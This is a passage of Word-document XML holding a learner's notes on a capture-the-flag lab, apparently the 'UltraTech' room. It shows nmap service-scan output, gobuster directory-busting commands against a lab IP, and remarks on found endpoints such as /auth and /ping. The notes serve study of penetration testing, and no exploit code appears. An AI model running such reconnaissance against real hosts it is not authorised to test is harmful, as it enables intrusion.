      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>hostkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1675764B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>|   2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3347E5A7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:t>|   256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6841F94E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>|_  256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460603AC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="6FC7AB42" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>8081/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">  open  http    Node.js Express framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A01F1A5" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>|_http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>cors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>: HEAD GET POST PUT DELETE PATCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A02BB9" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>|_http-title: Site doesn't have a title (text/html; charset=utf-8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA1772" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5C2255F1" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>31331/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> open  http    Apache httpd 2.4.29 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47DD30" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>|_http-server-header: Apache/2.4.29 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD3DB9" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D35C065" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>MAC Address: 02:43:22:16:AE:63 (Unknown)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3222A288" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Device type: general purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C20BF4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Running: Linux 3.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30517399" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">OS CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>:/o:linux:linux_kernel:3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCC740C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>OS details: Linux 3.10 - 3.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218CC46E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Network Distance: 1 hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30588229" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Service Info: OSs: Unix, Linux; CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>o:linux:linux_kernel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E861C56" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="09F9E6FD" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>TRACEROUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F1FEC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>HOP RTT     ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C187A6C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">1   0.37 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> 10.10.61.189</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D6B56" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="3DAB7D83" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>(took 20.88 seconds to scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FAD811" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="103FEDFA" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="7F995593" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="3874ECBA" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>First 30 minute block expired, enumeration skills apparently inadequate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA6D04" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Tried accessing websites, but neither of the port numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D251D4D" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>&gt;:8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1EDB6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:t>Or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6937AF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>&gt;:31331</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688A02DF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Would NOT resolve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119D1E19" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Tried researching </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> number, found RCE, but timer expired before finding relevant code or exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53986CF0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>VSFTP 3.0.3 has remote DoS, but nothing helpful otherwise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19981472" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Advancing via walkthrough…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A552A69" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="3048E58C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Enum weakness resolved</w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779AF8CF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">HTTPS was enabled automatically when I typed the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> address in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">; port numbers wouldn’t resolve because I got cock-blocked by HTTPS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F480BF2" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Resolution: strip off “s” in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> , run over HTTP. The sites showed up as active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF085F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Only looked at walkthrough to confirm port 80 can grant a connection to a web-browser at the target IP. No further info looked at from here. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F10CF7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="658B1B26" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Next 30-block: web enumeration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249D5C38" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="43E79AE6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> -u http://10.10.61.189:31331 -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">/directory-list-2.3-medium.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E3921" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="33527D15" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>Dirbuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> reveals /images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E955D26" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Within there, looking for information (Sleuth)…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432388CB" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>“Evie” might be a name, by filename, showed a computer…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4543B5AD" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>- Strike that, Evie seems to be a framework used to make the site with…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D9732" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="25BE41D7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>Gobuster’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> finished output for 31331</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0A56F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41073C03" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/images               (Status: 301) [Size: 322] [--&gt; http://10.10.61.189:31331/images/]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D960AC4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">                  (Status: 301) [Size: 319] [--&gt; http://10.10.61.189:31331/css/]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1027EC94" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">                   (Status: 301) [Size: 318] [--&gt; http://10.10.61.189:31331/js/]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ABA867" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">           (Status: 301) [Size: 326] [--&gt; http://10.10.61.189:31331/javascript/]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626871ED" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/server-status        (Status: 403) [Size: 303]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE76A43" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Progress: 220557 / 220558 (100.00%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E46C06" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110FA4B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="335F0077" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Switching over to busting port 8081…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA19A63" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">/auth appears quick, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACBAE7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">But visiting that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> asks for login + pass… might </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>wanna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> send this to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> to intercept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B2230" w14:textId="434320EA" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D183F74" wp14:editId="144C0406">
            <wp:extent cx="4686300" cy="962025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19406462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86300" cy="962025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB3F11" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="659F286B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> -u http://10.10.61.189:8081 -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">/directory-list-2.3-medium.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE8862" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>http://10.10.61.189:8081/auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6522E693" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="06F4807B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF19173" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A65CD69" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/auth                 (Status: 200) [Size: 39]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E85E685" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/ping                 (Status: 500) [Size: 1094]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E9710D" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/Ping                 (Status: 500) [Size: 1094]</w:t>
      </w:r>
    </w:p>
